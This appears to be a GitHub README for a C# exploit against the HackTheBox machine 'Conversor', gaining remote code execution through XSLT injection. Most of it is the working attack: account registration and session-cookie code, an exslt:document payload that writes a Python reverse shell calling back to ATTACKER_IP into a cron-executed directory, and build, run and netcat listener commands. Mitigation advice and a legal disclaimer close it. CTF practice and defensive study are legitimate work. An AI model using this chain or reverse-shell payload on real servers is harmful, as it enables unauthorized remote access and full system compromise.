A C# exploit implementation for the HackTheBox machine "Conversor" that achieves Remote Code Execution through XSLT injection via the exslt:document extension.

Conversor is an Easy-rated Linux machine on HackTheBox that features a web application vulnerable to XSLT injection. This exploit chains multiple attack vectors to achieve initial foothold by:

1. Registering a user account on the web application
2. Obtaining an authenticated session cookie
3. Uploading a malicious XSLT payload that leverages the exslt:document extension
4. Writing a reverse shell payload to disk
5. Waiting for a scheduled cron job to execute the payload

• Vulnerability Type: XSLT Server-Side Injection (CWE-91)
• Attack Vector: XSLT Extension Functions Abuse
• Impact: Remote Code Execution
• Difficulty: Easy

The application allows users to upload XML and XSLT files for transformation. The vulnerability exists because:

1. The XSLT processor has the exslt:document extension enabled
2. No input sanitization is performed on XSLT content
3. The web application has write permissions to the scripts directory
4. A cron job periodically executes Python scripts from this directory

The exploit abuses the exslt:document extension to write arbitrary files to the filesystem:

<exploit:document href="/path/to/file" method="text">
    <!-- Malicious content here -->
</exploit:document>

• .NET 6.0 or higher
• Network access to the target machine
• Netcat or similar listener for receiving the reverse shell

Before running the exploit, add the target to your /etc/hosts file:

echo "10.10.11.92 conversor.htb" | sudo tee -a /etc/hosts

# Clone the repository
git clone https://github.com/chrislpjones/conversor-exploit.git
cd conversor-exploit

# Build the project
dotnet build

dotnet run -- -t <target_url> -r <your_ip> -p <your_port>

Parameters:

• -t : Target URL (must use http://conversor.htb)
• -r : Your callback IP address for the reverse shell
• -p : Your callback port for the reverse shell

# Start your listener in one terminal
nc -lvnp 4444

# Run the exploit in another terminal
dotnet run -- -t http://conversor.htb -r 10.10.14.5 -p 4444

Note: You must use conversor.htb as the target URL, not the IP address directly.

[*] Registering new user account...
[+] User registered successfully
[*] Authenticating and obtaining session cookie...
[+] Session cookie obtained
[*] Crafting malicious XSLT payload...
[*] Uploading payload to target...
[+] Payload uploaded successfully

  Start your listener in a separate terminal:

    nc -lvnp 4444

[!] Note: Payload executes via cron job (may take up to 60 seconds)

┌─────────────────────┐
│  Register Account   │
│  (user3/password1)  │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│   Authenticate &    │
│  Obtain Session     │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  Craft XSLT Payload │
│  with exslt:doc     │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  Upload Malicious   │
│  XML + XSLT Files   │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  XSLT Transformation│
│  Writes exploit.py  │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│   Cron Job Executes │
│   Reverse Shell     │
└─────────────────────┘

1. User Registration

// Creates a new user account or uses existing credentials
var formData = new FormUrlEncodedContent([
    new KeyValuePair<string, string>("username", "user3"),
    new KeyValuePair<string, string>("password", "password1")
]);

2. Authentication

// Obtains session cookie for authenticated requests
HttpResponseMessage response = await http.PostAsync(url, formData);
string cookie = response.Headers.GetValues("Set-Cookie").First();

3. Malicious XSLT Payload

<exploit:document href="/var/www/conversor.htb/scripts/exploit.py" method="text">
<![CDATA[
import socket,os,pty
s=socket.socket()
s.connect(("ATTACKER_IP",PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
]]>
</exploit:document>

Organizations can protect against this type of attack by:

1. Disable Dangerous XSLT Extensions: Explicitly disable exslt:document and other file-writing extensions
2. Input Validation: Sanitize and validate all XSLT content before processing
3. Principle of Least Privilege: Run XSLT processors with minimal filesystem permissions
4. Sandboxing: Process XSLT transformations in isolated environments
5. Content Security Policy: Implement strict CSP headers
6. Regular Security Audits: Review code for injection vulnerabilities

# Disable document write extension
transformer = lxml.etree.XSLT(
    xslt_tree,
    extensions={('http://exslt.org/common', 'document'): None}
)

• OWASP - XSLT Injection
• EXSLT - document extension
• HackTheBox - Conversor Machine
• CWE-91: XML Injection

This exploit is provided for educational purposes only. It is designed for use in authorized penetration testing engagements and CTF competitions like HackTheBox.

DO NOT use this tool against systems you do not own or have explicit written permission to test. Unauthorized access to computer systems is illegal and punishable under laws such as the Computer Fraud and Abuse Act (CFAA) and similar legislation worldwide.

The author assumes no liability for misuse of this tool.

Contributions, improvements, and suggestions are welcome! Please feel free to:

• Open an issue for bug reports
• Submit pull requests for enhancements
• Share alternative exploitation techniques

This project is licensed under the MIT License - see the LICENSE file for details.

Christian - Penetration Tester & Security Researcher

• Specialized in web application security and exploitation
• Active participant in CTF challenges and HackTheBox platforms
• Check out my other security research and tools

If you found this exploit useful, please consider giving it a star on GitHub!